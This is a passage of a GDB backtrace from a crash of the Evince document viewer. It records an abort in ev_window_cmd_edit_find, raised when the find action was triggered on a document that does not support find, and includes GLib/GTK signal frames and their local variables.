#25 0xb749313b in IA__g_closure_invoke (closure=0x80f3428 return_value=0xbfd465a0 n_param_values=2 param_values=0xbfd4667c 
    invocation_hint=0xbfd4658c) at gclosure.c:490
#26 0xb74a3d1f in signal_emit_unlocked_R (node=0x80f33a0 detail=0 instance=0x8101078 emission_return=0xbfd4683c 
    instance_and_params=0xbfd4667c) at gsignal.c:2476
#27 0xb74a49b8 in IA__g_signal_emit_valist (instance=0x8101078 signal_id=58 detail=0 
    var_args=0xbfd468c0 Ã˜hÃ”Â¿(7'\bx\020\020\b?ÃŒ\205Â·x\020\020\bÃQ\017\b) at gsignal.c:2207
#28 0xb74a4d89 in IA__g_signal_emit (instance=0x8101078 signal_id=58 detail=0) at gsignal.c:2241
#29 0xb78587b4 in gtk_widget_event_internal (widget=0x8101078 event=0x8273728) at gtkwidget.c:3911
#30 0xb774034a in IA__gtk_propagate_event (widget=0x8101078 event=0x8273728) at gtkmain.c:2162
#31 0xb77414f7 in IA__gtk_main_do_event (event=0x8273728) at gtkmain.c:1422
#32 0xb75d7a4a in gdk_event_dispatch (source=0x80e8c90 callback=0 user_data=0x0) at gdkevents-x11.c:2320
#33 0xb741b861 in IA__g_main_context_dispatch (context=0x80e8cd8) at gmain.c:2045
#34 0xb741e8d6 in g_main_context_iterate (context=0x80e8cd8 block=1 dispatch=1 self=0x80cb2e8) at gmain.c:2677
#35 0xb741ec97 in IA__g_main_loop_run (loop=0x8458130) at gmain.c:2881
#36 0xb7741971 in IA__gtk_main () at gtkmain.c:1001
#37 0x0807dc40 in main (argc=2 argv=) at main.c:345
Thread 2 (Thread -1233691728 (LWP 17787)):
#0  0xb720ac01 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x0805dc13 in ev_render_thread (data=0x0) at ev-job-queue.c:179
	job = (EvJob *) 0x855c110
#2  0xb74393ff in g_thread_create_proxy (data=0x80fdd80) at gthread.c:553
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#3  0xb72080bd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0xb719b8fe in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1231468864 (LWP 17786)):
#0  0xb720e201 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7efa9d5 in libgnomeui_segv_handle (signum=6) at gnome-ui-init.c:870
	estatus = -1076604456
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} sa_mask = {__val = {137459584 139837712 137358480 
      3075221240 49 135229640 3218363288 3075098663 3075222108 135219448 3218363100 0 3218362708 3218362708 0 
      3075294400 3218363228 3218363164 3218363100 3072374645 3083432208 139208208 3218362696 3072374645 3083432208 1 
      3218362712 3083427461 1 3074953700 3218362792 3074634007}} sa_flags = 135050072 sa_restorer = 0x80f60e8}
	pid = 0
	in_segv = 1
#2  
No symbol table info available.
#3  0xb70f8947 in raise () from /lib/tls/libc.so.6
No symbol table info available.
#4  0xb70fa0c9 in abort () from /lib/tls/libc.so.6
No symbol table info available.
#5  0xb74241a4 in IA__g_logv (log_domain= log_level=G_LOG_LEVEL_ERROR 
    format=0x80b50f0 Find action should be insensitive since document doesn't support find 
    args1=0xbfd45a6c Ã²\027IÂ·Ã¸&amp;LÂ·Ã \021\a\b\230ZÃ”Â¿Ã‹\005JÂ·PI\035\bx\020\020\b\002) at gmessages.c:497
	depth = 
	domain = (GLogDomain *) 0x0
	data = (gpointer) 0x0
	log_func = (GLogFunc) 0xb7424ac0 
	domain_fatal_mask = 5
	test_level = 
	was_recursion = 0
	i = 
#6  0xb74241d9 in IA__g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x80b50f0 Find action should be insensitive since document doesn't support find) at gmessages.c:517
	args = 0xbfd45a6c Ã²\027IÂ·Ã¸&amp;LÂ·Ã \021\a\b\230ZÃ”Â¿Ã‹\005JÂ·PI\035\bx\020\020\b\002
#7  0x080712ae in ev_window_cmd_edit_find (action=0x81d4950 ev_window=0x8101078) at ev-window.c:1889
	__PRETTY_FUNCTION__ = ev_window_cmd_edit_find
#8  0xb74a05cb in IA__g_cclosure_marshal_VOID__VOID (closure=0x8232868 return_value=0x0 n_param_values=1 
    param_values=0xbfd45cac invocation_hint=0xbfd45bbc marshal_data=0x80711e0) at gmarshal.c:77
	data1 = (gpointer) 0x81d4950
	data2 = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__VOID
#9  0xb749313b in IA__g_closure_invoke (closure=0x8232868 return_value=0x0 n_param_values=1 param_values=0xbfd45cac 
    invocation_hint=0xbfd45bbc) at gclosure.c:490
	marshal = (GClosureMarshal) 0x805954c 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#10 0xb74a36dd in signal_emit_unlocked_R (node=0x81102e0 detail=0 instance=0x81d4950 emission_return=0x0 
    instance_and_params=0xbfd45cac) at gsignal.c:2438
	tmp = 
	handler = (Handler *) 0x812d0e0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x81d4950 ihint = {signal_id = 109 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x81109e0
	handler_list = (Handler *) 0x812d0e0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0}}}
	signal_id = 109
	max_sequential_handler_number = 838
	return_value_altered = 1
#11 0xb74a4bd9 in IA__g_signal_emit_valist (instance=0x81d4950 signal_id=109 detail=0 
    var_args=0xbfd45eec ÃˆÃ½\224Â·Ã€Ã®\021\bÃ¿Ã¿Ã¿Ã¿\030_Ã”Â¿\004\213fÂ·PI\035\b\001) at gsignal.c:2197
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1218792646 v_long = -1218792646 v_int64 = 582494394156495674 
    v_double = 1.0143868941020741e-269 v_pointer = 0xb75ab33a} {v_int = 136118120 v_long = 136118120 
    v_int64 = 594783495241138024 v_double = 6.4719426230719842e-269 v_pointer = 0x81cff68} {v_int = 512 v_long = 512 
    v_int64 = 512 v_double = 2.5296161067071823e-321 v_pointer = 0x200} {v_int = 671 v_long = 671 v_int64 = 2473901163167 
    v_double = 1.2222695759275149e-311 v_pointer = 0x29f} {v_int = 136137040 v_long = 136137040 v_int64 = 136137040 
    v_double = 6.7260634590515614e-316 v_pointer = 0x81d4950} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 
    v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 136118120 data = {{v_int = 135622544 v_uint = 135622544 v_long = 135622544 
      v_ulong = 135622544 v_int64 = 597826531109466000 v_uint64 = 597826531109466000 v_float = 4.49691976e-34 
      v_double = 1.0564748630830222e-268 v_pointer = 0x8156f90} {v_int = -1219869877 v_uint = 3075097419 
      v_long = -1219869877 v_ulong = 3075097419 v_int64 = -5218267029705178293 v_uint64 = 13228477044004373323 
      v_float = -1.20558061e-05 v_double = -6.0242202658982042e-41 v_pointer = 0xb74a434b}}}
	error = 
	instance_and_params = (GValue *) 0xbfd45cac
	stack_values = {{g_type = 135334216 data = {{v_int = 136137040 v_uint = 136137040 v_long = 136137040 
        v_ulong = 136137040 v_int64 = 136137040 v_uint64 = 136137040 v_float = 4.73316474e-34 
        v_double = 6.7260634590515614e-316 v_pointer = 0x81d4950} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 3218365672 data = {{
        v_int = -1222585382 v_uint = 3072381914 v_long = -1222585382 v_ulong = 3072381914 v_int64 = 140511335386 
        v_uint64 = 140511335386 v_float = -9.5860687e-06 v_double = 6.9421823665500089e-313 v_pointer = 0xb720d3da} {
        v_int = -1230050367 v_uint = 3064916929 v_long = -1230050367 v_ulong = 3064916929 v_int64 = 15949818817 
        v_uint64 = 15949818817 v_float = -5.21304946e-06 v_double = 7.8802575348719719e-314 v_pointer = 0xb6aeebc1}}} {
    g_type = 3218365840 data = {{v_int = 32 v_uint = 32 v_long = 32 v_ulong = 32 v_int64 = -5282998821360500704 
        v_uint64 = 13163745252349050912 v_float = 4.48415509e-44 v_double = -2.7165766692200369e-45 v_pointer = 0x20} {
        v_int = 135115096 v_uint = 135115096 v_long = 135115096 v_ulong = 135115096 v_int64 = 598210088868360536 
        v_uint64 = 598210088868360536 v_float = 4.26391107e-34 v_double = 1.1080624081482862e-268 v_pointer = 0x80db158}}} {
    g_type = 3218365720 data = {{v_int = -1230068283 v_uint = 3064899013 v_long = -1230068283 v_ulong = 3064899013 
        v_int64 = -5282992427384265275 v_uint64 = 13163751646325286341 v_float = -5.20490221e-06 
        v_double = -2.7185661598100047e-45 v_pointer = 0xb6aea5c5} {v_int = 135115096 v_uint = 135115096 v_long = 135115096 
        v_ulong = 135115096 v_int64 = 137574068568 v_uint64 = 137574068568 v_float = 4.26391107e-34 
        v_double = 6.7970621038056856e-313 v_pointer = 0x80db158}}} {g_type = 3070513590 data = {{v_int = 135116440 
        v_uint = 135116440 v_long = 135116440 v_ulong = 135116440 v_int64 = 580323268067440280 
        v_uint64 = 580323268067440280 v_float = 4.2645282e-34 v_double = 7.0326330384092963e-270 v_pointer = 0x80db698} {
        v_int = -1076601544 v_uint = 3218365752 v_long = -1076601544 v_ulong = 3218365752 v_int64 = -5258998845834765000 
        v_uint64 = 13187745227874786616 v_float = -1.65909481 v_double = -1.1368938249718228e-43 v_pointer = 0xbfd45d38}}} {
    g_type = 3064923280 data = {{v_int = 135115096 v_uint = 135115096 v_long = 135115096 v_ulong = 135115096 
        v_int64 = -4623968422167989928 v_uint64 = 13822775651541561688 v_float = 4.26391107e-34 
        v_double = -0.31818962847207422 v_pointer = 0x80db158} {v_int = -1230065634 v_uint = 3064901662 
        v_long = -1230065634 v_ulong = 3064901662 v_int64 = 3064901662 v_uint64 = 3064901662 v_float = -5.20610683e-06 
        v_double = 1.5142626190759399e-314 v_pointer = 0xb6aeb01e}}} {g_type = 135117284 data = {{v_int = 139343048 
        v_uint = 139343048 v_long = 139343048 v_ulong = 139343048 v_int64 = -5232815856399010616 
        v_uint64 = 13213928217310541000 v_float = 6.20529141e-34 v_double = -6.2073363640663693e-42 v_pointer = 0x84e34c8} {
        v_int = 136118120 v_uint = 136118120 v_long = 136118120 v_ulong = 136118120 v_int64 = 598210088869363560 
        v_uint64 = 598210088869363560 v_float = 4.7244771e-34 v_double = 1.1080624082831904e-268 v_pointer = 0x81cff68}}} {
    g_type = 3218365816 data = {{v_int = -1218627672 v_uint = 3076339624 v_long = -1218627672 v_ulong = 3076339624 
        v_int64 = 580314921592240040 v_uint64 = 580314921592240040 v_float = -1.3185585e-05 
        v_double = 7.025616915095016e-270 v_pointer = 0xb75d37a8} {v_int = 29364645 v_uint = 29364645 v_long = 29364645 
        v_ulong = 29364645 v_int64 = 594747451768836517 v_uint64 = 594747451768836517 v_float = 7.05549797e-38 
        v_double = 6.4234650676440454e-269 v_pointer = 0x1c011a5}}} {g_type = 139281640 data = {{v_int = 512 v_uint = 512 
        v_long = 512 v_ulong = 512 v_int64 = 512 v_uint64 = 512 v_float = 7.17464814e-43 
        v_double = 2.5296161067071823e-321 v_pointer = 0x200} {v_int = 671 v_uint = 671 v_long = 671 v_ulong = 671 
        v_int64 = 2473901163167 v_uint64 = 2473901163167 v_float = 9.4027127e-43 v_double = 1.2222695759275149e-311 
        v_pointer = 0x29f}}} {g_type = 176 data = {{v_int = 64 v_uint = 64 v_long = 64 v_ulong = 64 v_int64 = 64 
        v_uint64 = 64 v_float = 8.96831017e-44 v_double = 3.1620201333839779e-322 v_pointer = 0x40} {v_int = -1218359884 
        v_uint = 3076607412 v_long = -1218359884 v_ulong = 3076607412 v_int64 = 277954514356 v_uint64 = 277954514356 
        v_float = -1.34291367e-05 v_double = 1.3732777664978717e-312 v_pointer = 0xb7614db4}}} {g_type = 176 data = {{
        v_int = -1076601416 v_uint = 3218365880 v_long = -1076601416 v_ulong = 3218365880 v_int64 = -5234674551956939336 
        v_uint64 = 13212069521752612280 v_float = -1.65911007 v_double = -4.7890982935327843e-42 v_pointer = 0xbfd45db8} {
        v_int = 137311744 v_uint = 137311744 v_long = 137311744 v_ulong = 137311744 v_int64 = 584622873930315264 
        v_uint64 = 584622873930315264 v_float = 5.27256236e-34 v_double = 1.3722308032205074e-269 v_pointer = 0x82f3600}}} {
    g_type = 138483824 data = {{v_int = 512 v_uint = 512 v_long = 512 v_ulong = 512 v_int64 = 512 v_uint64 = 512 
        v_float = 7.17464814e-43 v_double = 2.5296161067071823e-321 v_pointer = 0x200} {v_int = 671 v_uint = 671 
        v_long = 671 v_ulong = 671 v_int64 = 2473901163167 v_uint64 = 2473901163167 v_float = 9.4027127e-43 
        v_double = 1.2222695759275149e-311 v_pointer = 0x29f}}} {g_type = 176 data = {{v_int = 64 v_uint = 64 v_long = 64 
        v_ulong = 64 v_int64 = 4611686035607257152 v_uint64 = 4611686035607257152 v_float = 8.96831017e-44 
        v_double = 2.0000076293945597 v_pointer = 0x40} {v_int = 136062064 v_uint = 136062064 v_long = 136062064 
        v_ulong = 136062064 v_int64 = -5232815856402291600 v_uint64 = 13213928217307260016 v_float = 4.69873745e-34 
        v_double = -6.2073363598848421e-42 v_pointer = 0x81c2470}}} {g_type = 64 data = {{v_int = 176 v_uint = 176 
        v_long = 176 v_ulong = 176 v_int64 = -4623967666388860752 v_uint64 = 13822776407320690864 v_float = 2.4662853e-43 
        v_double = -0.31823158264161133 v_pointer = 0xb0} {v_int = -1218745588 v_uint = 3076221708 v_long = -1218745588 
        v_ulong = 3076221708 v_int64 = 589749452912945932 v_uint64 = 589749452912945932 v_float = -1.3078341e-05 
        v_double = 2.9539344616951956e-269 v_pointer = 0xb75b6b0c}}} {g_type = 136118120 data = {{v_int = 138483824 
        v_uint = 138483824 v_long = 138483824 v_ulong = 138483824 v_int64 = 2199161739376 v_uint64 = 2199161739376 
        v_float = 5.8107551e-34 v_double = 1.0865302650741626e-311 v_pointer = 0x8411870} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 2881923055616 v_uint64 = 2881923055616 v_float = 0 v_double = 1.4238591757376977e-311 
        v_pointer = 0x0}}} {g_type = 576 data = {{v_int = 176 v_uint = 176 v_long = 176 v_ulong = 176 
        v_int64 = 274877907120 v_uint64 = 274877907120 v_float = 2.4662853e-43 v_double = 1.3580773070873298e-312 
        v_pointer = 0xb0} {v_int = 176 v_uint = 176 v_long = 176 v_ulong = 176 v_int64 = -4623967391510953808 
        v_uint64 = 13822776682198597808 v_float = 2.4662853e-43 v_double = -0.31824684143067383 v_pointer = 0xb0}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfd45cc0
	node = (SignalNode *) 0x81102e0
	i = 0
	n_params = 0
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#12 0xb74a4d89 in IA__g_signal_emit (instance=0x81d4950 signal_id=109 detail=0) at gsignal.c:2241
	var_args = 0xbfd45eec ÃˆÃ½\224Â·Ã€Ã®\021\bÃ¿Ã¿Ã¿Ã¿\030_Ã”Â¿\004\213fÂ·PI\035\b\001
#13 0xb7666743 in _gtk_action_emit_activate (action=0x81d4950) at gtkaction.c:835
	group = (GtkActionGroup *) 0x80ff350
#14 0xb7668b04 in closure_accel_activate (closure=0x811eec0 return_value=0xbfd46050 n_param_values=4 param_values=0xbfd4612c 
    invocation_hint=0xbfd4603c marshal_data=0x0) at gtkaction.c:1602
No locals.
#15 0xb749313b in IA__g_closure_invoke (closure=0x811eec0 return_value=0xbfd46050 n_param_values=4 param_values=0xbfd4612c 
    invocation_hint=0xbfd4603c) at gclosure.c:490
	marshal = (GClosureMarshal) 0xb7668ad0 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#16 0xb74a36dd in signal_emit_unlocked_R (node=0x81194f8 detail=906 instance=0x811ad60 emission_return=0xbfd462ec 
    instance_and_params=0xbfd4612c) at gsignal.c:2438
	tmp = 
	handler = (Handler *) 0x826c4c0
	accumulator = (SignalAccumulator *) 0x8119318
	emission = {next = 0xbfd46584 instance = 0x811ad60 ihint = {signal_id = 121 detail = 906 
    run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x0
	handler_list = (Handler *) 0x826c4a0
	return_accu = (GValue *) 0xbfd46050
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0}}}
	signal_id = 121
	max_sequential_handler_number = 838
	return_value_altered = 0
#17 0xb74a49b8 in IA__g_signal_emit_valist (instance=0x811ad60 signal_id=121 detail=906 
    var_args=0xbfd46378 \210cÃ”Â¿$fÂ·x\020\020\bÂ­\002) at gsignal.c:2207
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1224552937 v_long = -1224552937 v_int64 = 580940303184350743 
    v_double = 7.5513183954760363e-270 v_pointer = 0xb702ce17} {v_int = 17 v_long = 17 v_int64 = -4623962306269675503 
    v_double = -0.31852912902832126 v_pointer = 0x11} {v_int = -1219906683 v_long = -1219906683 
    v_int64 = -5251411618745961595 v_double = -3.5019131413823119e-43 v_pointer = 0xb749b385} {v_int = -1076599880 
    v_long = -1076599880 v_int64 = -5232933724402457672 v_double = -6.0571167137680998e-42 v_pointer = 0xbfd463b8} {
    v_int = -1219801164 v_long = -1219801164 v_int64 = 71794642868 v_double = 3.5471266596520065e-313 
    v_pointer = 0xb74b4fb4} {v_int = -1222642488 v_long = -1222642488 v_int64 = -5257747545913822008 
    v_double = -1.3860732977786925e-43 v_pointer = 0xb71ff4c8} {v_int = 47 v_long = 47 v_int64 = -5251232401425694673 
    v_double = -3.5732905571953287e-43 v_pointer = 0x2f} {v_int = -1224176736 v_long = -1224176736 v_int64 = 20250659744 
    v_double = 1.0005155285130692e-313 v_pointer = 0xb7088ba0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0}}}
	error = 
	instance_and_params = (GValue *) 0xbfd4612c
	stack_values = {{g_type = 135365824 data = {{v_int = 135376224 v_uint = 135376224 v_long = 135376224 
        v_ulong = 135376224 v_int64 = 135376224 v_uint64 = 135376224 v_float = 4.38381516e-34 
        v_double = 6.6884741542109261e-316 v_pointer = 0x811ad60} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 80 data = {{v_int = 135270520 
        v_uint = 135270520 v_long = 135270520 v_ulong = 135270520 v_int64 = 135270520 v_uint64 = 135270520 
        v_float = 4.33527827e-34 v_double = 6.6832516827081257e-316 v_pointer = 0x8101078} {v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 28 data = {
      {v_int = 47 v_uint = 47 v_long = 47 v_ulong = 47 v_int64 = 47 v_uint64 = 47 v_float = 6.58610278e-44 
        v_double = 2.3221085354538588e-322 v_pointer = 0x2f} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 135366040 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 134979064 
    data = {{v_int = -1223470639 v_uint = 3071496657 v_long = -1223470639 v_ulong = 3071496657 
        v_int64 = -5251209531948314159 v_uint64 = 13195534541761237457 v_float = -8.78093215e-06 
        v_double = -3.5823988520520096e-43 v_pointer = 0xb71351d1} {v_int = 4 v_uint = 4 v_long = 4 v_ulong = 4 
        v_int64 = -4623963543220256764 v_uint64 = 13822780530489294852 v_float = 5.60519386e-45 
        v_double = -0.31846046447753928 v_pointer = 0x4}}} {g_type = 3071507535 data = {{v_int = -1222642496 
        v_uint = 3072324800 v_long = -1222642496 v_ulong = 3072324800 v_int64 = 20252193984 v_uint64 = 20252193984 
        v_float = -9.53412382e-06 v_double = 1.0005913300407168e-313 v_pointer = 0xb71ff4c0} {v_int = -1220013596 
        v_uint = 3074953700 v_long = -1220013596 v_ulong = 3074953700 v_int64 = 3074953700 v_uint64 = 3074953700 
        v_float = -1.19250944e-05 v_double = 1.5192289857224307e-314 v_pointer = 0xb74811e4}}} {g_type = 16 data = {{
        v_int = -1076600360 v_uint = 3218366936 v_long = -1076600360 v_ulong = 3218366936 v_int64 = -5241576478502264360 
        v_uint64 = 13205167595207287256 v_float = -1.65923595 v_double = -1.6303981041174755e-42 v_pointer = 0xbfd461d8} {
        v_int = -1223470639 v_uint = 3071496657 v_long = -1223470639 v_ulong = 3071496657 v_int64 = 2953714029009 
        v_uint64 = 2953714029009 v_float = -8.78093215e-06 v_double = 1.459328629372682e-311 v_pointer = 0xb71351d1}}} {
    g_type = 0 data = {{v_int = -1219835167 v_uint = 3075132129 v_long = -1219835167 v_ulong = 3075132129 
        v_int64 = 4579668522074557153 v_uint64 = 4579668522074557153 v_float = -1.20873747e-05 
        v_double = 0.014770997434742696 v_pointer = 0xb74acae1} {v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 
        v_uint64 = 1 v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 v_pointer = 0x1}}} {g_type = 3074953700 
    data = {{v_int = 4 v_uint = 4 v_long = 4 v_ulong = 4 v_int64 = 107374182404 v_uint64 = 107374182404 
        v_float = 5.60519386e-45 v_double = 5.304989477610807e-313 v_pointer = 0x4} {v_int = -1076600328 
        v_uint = 3218366968 v_long = -1076600328 v_ulong = 3218366968 v_int64 = -5241237932000124424 
        v_uint64 = 13205506141709427192 v_float = -1.65923977 v_double = -1.738265242937739e-42 v_pointer = 0xbfd461f8}}} {
    g_type = 3072277748 data = {{v_int = 139911184 v_uint = 139911184 v_long = 139911184 v_ulong = 139911184 
        v_int64 = 17319780368 v_uint64 = 17319780368 v_float = 6.46616667e-34 v_double = 8.5571084733444627e-314 
        v_pointer = 0x856e010} {v_int = -1219746056 v_uint = 3075221240 v_long = -1219746056 v_ulong = 3075221240 
        v_int64 = -5251232398350473480 v_uint64 = 13195511675359078136 v_float = -1.21684207e-05 
        v_double = -3.5732917819728306e-43 v_pointer = 0xb74c26f8}}} {g_type = 3072324800 data = {{v_int = 139911184 
        v_uint = 139911184 v_long = 139911184 v_ulong = 139911184 v_int64 = -4623963062044008432 
        v_uint64 = 13822781011665543184 v_float = 6.46616667e-34 v_double = -0.31848717512502933 v_pointer = 0x856e010} {
        v_int = -1223468734 v_uint = 3071498562 v_long = -1223468734 v_ulong = 3071498562 v_int64 = -5254755027451160254 
        v_uint64 = 13191989046258391362 v_float = -8.78266474e-06 v_double = -2.1703238004168595e-43 
        v_pointer = 0xb7135942}}} {g_type = 139911184 data = {{v_int = -1220013596 v_uint = 3074953700 v_long = -1220013596 
        v_ulong = 3074953700 v_int64 = 600913962699592164 v_uint64 = 600913962699592164 v_float = -1.19250944e-05 
        v_double = 1.7320077128855033e-268 v_pointer = 0xb74811e4} {v_int = -1076600168 v_uint = 3218367128 
        v_long = -1076600168 v_ulong = 3218367128 v_int64 = -4623962921526599016 v_uint64 = 13822781152182952600 
        v_float = -1.65925884 v_double = -0.31849497540819405 v_pointer = 0xbfd46298}}} {g_type = 3074567265 data = {{
        v_int = -1222647820 v_uint = 3072319476 v_long = -1222647820 v_ulong = 3072319476 v_int64 = -5251209531947491340 
        v_uint64 = 13195534541762060276 v_float = -9.52928167e-06 v_double = -3.5823988523797162e-43 v_pointer = 0xb71fdff4} 
      {v_int = 139913536 v_uint = 139913536 v_long = 139913536 v_ulong = 139913536 v_int64 = -4623962855885575872 
        v_uint64 = 13822781217823975744 v_float = 6.46724666e-34 v_double = -0.31849861921695677 v_pointer = 0x856e940}}} {
    g_type = 3071498562 data = {{v_int = -1222642496 v_uint = 3072324800 v_long = -1222642496 v_ulong = 3072324800 
        v_int64 = 600924064460043456 v_uint64 = 600924064460043456 v_float = -9.53412382e-06 
        v_double = 1.7347250351684443e-268 v_pointer = 0xb71ff4c0} {v_int = -1218359884 v_uint = 3076607412 
        v_long = -1218359884 v_ulong = 3076607412 v_int64 = 71796084148 v_uint64 = 71796084148 v_float = -1.34291367e-05 
        v_double = 3.5471978683454103e-313 v_pointer = 0xb7614db4}}} {g_type = 3072324808 data = {{v_int = -1076600216 
        v_uint = 3218367080 v_long = -1076600216 v_ulong = 3218367080 v_int64 = -5239103698326232472 
        v_uint64 = 13207640375383319144 v_float = -1.65925312 v_double = -2.418271323406492e-42 v_pointer = 0xbfd46268} {
        v_int = -1223470639 v_uint = 3071496657 v_long = -1223470639 v_ulong = 3071496657 v_int64 = -5254755027451162159 
        v_uint64 = 13191989046258389457 v_float = -8.78093215e-06 v_double = -2.1703238004161008e-43 
        v_pointer = 0xb71351d1}}} {g_type = 3076580708 data = {{v_int = -1219890399 v_uint = 3075076897 
        v_long = -1219890399 v_ulong = 3075076897 v_int64 = -5232815853463276767 v_uint64 = 13213928220246274849 
        v_float = -1.20371415e-05 v_double = -6.2073401055814478e-42 v_pointer = 0xb749f321} {v_int = 1073741825 
        v_uint = 1073741825 v_long = 1073741825 v_ulong = 1073741825 v_int64 = 1073741825 v_uint64 = 1073741825 
        v_float = 2.00000024 v_double = 5.3049894823538372e-315 v_pointer = 0x40000001}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 20
	param_values = (GValue *) 0xbfd46140
	node = (SignalNode *) 0x81194f8
	i = 3
	n_params = 3
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#18 0xb74a4d89 in IA__g_signal_emit (instance=0x811ad60 signal_id=121 detail=906) at gsignal.c:2241
	var_args = 0xbfd4636c x\020\020\b/
#19 0xb7662639 in IA__gtk_accel_group_activate (accel_group=0x811ad60 accel_quark=906 acceleratable=0x8101078 accel_key=47 
    accel_mods=0) at gtkaccelgroup.c:736
	was_handled = 0
	__PRETTY_FUNCTION__ = IA__gtk_accel_group_activate
#20 0xb766273a in IA__gtk_accel_groups_activate (object=0x8101078 accel_key=47 accel_mods=0) at gtkaccelgroup.c:774
	accel_name = 
	accel_quark = 906
	slist = (GSList *) 0x810eab0
	__PRETTY_FUNCTION__ = IA__gtk_accel_groups_activate
#21 0xb786b8ba in IA__gtk_window_activate_key (window=0x8101078 event=0x8273728) at gtkwindow.c:7704
	entries = 
	tmp_list = 
	key_hash = 
	found_entry = (GtkWindowKeyEntry *) 0x832b750
#22 0xb786b93c in gtk_window_key_press_event (widget=0x8101078 event=0x8273728) at gtkwindow.c:4697
	handled = 
#23 0xb7746ee2 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80f3428 return_value=0xbfd465a0 n_param_values=2 
    param_values=0xbfd4667c invocation_hint=0xbfd4658c marshal_data=0xb786b910) at gtkmarshalers.c:83
	data1 = (gpointer) 0x8101078
	data2 = 
	v_return = 
	__PRETTY_FUNCTION__ = _gtk_marshal_BOOLEAN__BOXED
#24 0xb74916f9 in g_type_class_meta_marshal (closure=0x80f3428 return_value=0xbfd465a0 n_param_values=2 
    param_values=0xbfd4667c invocation_hint=0xbfd4658c marshal_data=0xcc) at gclosure.c:567
	callback = 
#25 0xb749313b in IA__g_closure_invoke (closure=0x80f3428 return_value=0xbfd465a0 n_param_values=2 param_values=0xbfd4667c 
    invocation_hint=0xbfd4658c) at gclosure.c:490
	marshal = (GClosureMarshal) 0xb74916b0 
	marshal_data = (gpointer) 0xcc
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#26 0xb74a3d1f in signal_emit_unlocked_R (node=0x80f33a0 detail=0 instance=0x8101078 emission_return=0xbfd4683c 
    instance_and_params=0xbfd4667c) at gsignal.c:2476
	tmp = 
	handler = (Handler *) 0xbfd46558
	accumulator = (SignalAccumulator *) 0x80f33e8
	emission = {next = 0x0 instance = 0x8101078 ihint = {signal_id = 58 detail = 0 run_type = G_SIGNAL_RUN_LAST} 
  state = EMISSION_RUN chain_type = 135258720}
	class_closure = (GClosure *) 0x80f3428
	handler_list = (Handler *) 0x826c060
	return_accu = (GValue *) 0xbfd465a0
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
